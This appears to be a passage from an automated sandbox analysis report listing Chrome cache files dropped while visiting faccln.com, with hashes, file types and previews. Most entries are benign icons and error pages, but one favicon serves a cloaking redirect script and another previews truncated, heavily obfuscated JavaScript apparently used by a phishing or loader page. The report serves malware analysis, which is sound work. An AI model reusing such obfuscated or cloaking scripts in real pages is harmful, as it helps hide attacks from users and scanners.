                              MD5:A9CC2824EF3517B6C4160DCF8FF7D410
                              SHA1:8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
                              SHA-256:34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
                              SHA-512:AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
                              Malicious:false
                              Reputation:unknown
                              URL:https://faccln.com/e/c491bc587d9cb76304772eac2f3b42356621765faadad
                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>

                              Chrome Cache Entry: 93

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:dropped
                              Size (bytes):3651
                              Entropy (8bit):4.094801914706141
                              Encrypted:false
                              SSDEEP:
                              MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                              SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                              SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                              SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                              Malicious:false
                              Reputation:unknown
                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

                              Chrome Cache Entry: 94

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):113
                              Entropy (8bit):4.630680211224016
                              Encrypted:false
                              SSDEEP:
                              MD5:3F59186F48B4CFFB54082F15FDB4292C
                              SHA1:C1329760FF34FA233E5FDACD5729B780D8C4045F
                              SHA-256:37889C0066BE4DC21ACB21D4E9499EADD51DF86E77D1095EADC7622D17814BE5
                              SHA-512:9E5D2E11FB323F089BB001B68138481AB94D7D2F3940DD03696E1063CD47325AFF002FE26C1419570B134D708C0F4C749381529583D55293A1D4C1ECB892F1C7
                              Malicious:false
                              Reputation:unknown
                              URL:https://splendidanimations.com/favicon.ico
                              Preview:<script type="text/javascript">window.location.href = "https://www.wikipedia.org/wiki/Microsoft_Office"</script>.

                              Chrome Cache Entry: 95

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):16
                              Entropy (8bit):3.875
                              Encrypted:false
                              SSDEEP:
                              MD5:D6B82198AF25D0139723AF9E44D3D23A
                              SHA1:D60DEEF1847EEEF1889803E9D3ADC7EDA220F544
                              SHA-256:A5C8CC49FA6649BE393EF22C2B31F1C46B671F8D763F783ED6D7B4E33669BDA3
                              SHA-512:B21BEE2EEC588308A9DC3C3C2405377704B39B08AA20CBA40BA6E6834E67CF6F2C086E0701F5B05AEE27E2677E9C5C24FF137318275ACA00DD063DF3DCC07D4D
                              Malicious:false
                              Reputation:unknown
                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnTn2980JmsCRIFDVd69_0=?alt=proto
                              Preview:CgkKBw1Xevf9GgA=

                              Chrome Cache Entry: 96

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):315
                              Entropy (8bit):5.0572271090563765
                              Encrypted:false
                              SSDEEP:
                              MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                              SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                              SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                              SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                              Malicious:false
                              Reputation:unknown
                              URL:https://faccln.com/favicon.ico
                              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

                              Chrome Cache Entry: 99

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6357), with no line terminators
                              Category:downloaded
                              Size (bytes):6357
                              Entropy (8bit):5.243003524346767
                              Encrypted:false
                              SSDEEP:
                              MD5:82FF6E77E3B8F004B23294185E108264
                              SHA1:03C685B50FD4587427495348CD1231882A8C48D0
                              SHA-256:0E230A53A5D5ABD125C2A8E1CDD97B32DDD84A9F7FD07C23BFF95413886B05FA
                              SHA-512:4A2CE7166010BDAEBFA09A7D7F8F858AB28FFF7128F4EF650D8BD0214E3AECADE963D29A4BC5B27E820FF45B3827B6BE69F519DC890118FD423D5375B3893758
                              Malicious:false
                              Reputation:unknown
                              URL:https://faccln.com/jm/c491bc587d9cb76304772eac2f3b42356621765dca779
                              Preview:var _0x93a3bf=_0x2d52;(function(_0x547797,_0x18550f){var _0x59203=_0x2d52,_0x4480cd=_0x547797();while(!![]){try{var _0xcc5b57=-parseInt(_0x59203(0xeb))/0x1+parseInt(_0x59203(0x10b))/0x2*(-parseInt(_0x59203(0xfa))/0x3)+-parseInt(_0x59203(0xd9))/0x4+-parseInt(_0x59203(0xe4))/0x5*(parseInt(_0x59203(0xe0))/0x6)+parseInt(_0x59203(0xfb))/0x7+parseInt(_0x59203(0xe3))/0x8*(-parseInt(_0x59203(0xec))/0x9)+-parseInt(_0x59203(0xd7))/0xa*(-parseInt(_0x59203(0xcb))/0xb);if(_0xcc5b57===_0x18550f)break;else _0x4480cd['push'](_0x4480cd['shift']());}catch(_0x1f86db){_0x4480cd['push'](_0x4480cd['shift']());}}}(_0x5821,0xf115f));var _0x743837=(function(){var _0x2211cb=!![];return function(_0x41026e,_0x2b42dd){var _0x50a8cc=_0x2211cb?function(){var _0x2a2063=_0x2d52;if(_0x2b42dd){var _0x1cceff=_0x2b42dd[_0x2a2063(0xdb)](_0x41026e,arguments);return _0x2b42dd=null,_0x1cceff;}}:function(){};return _0x2211cb=![],_0x50a8cc;};}()),_0x4a9cd1=_0x743837(this,function(){var _0x3e2c84=_0x2d52;return _0x4a9cd1[_0x3e2c

                              Static File Info

                              No static file info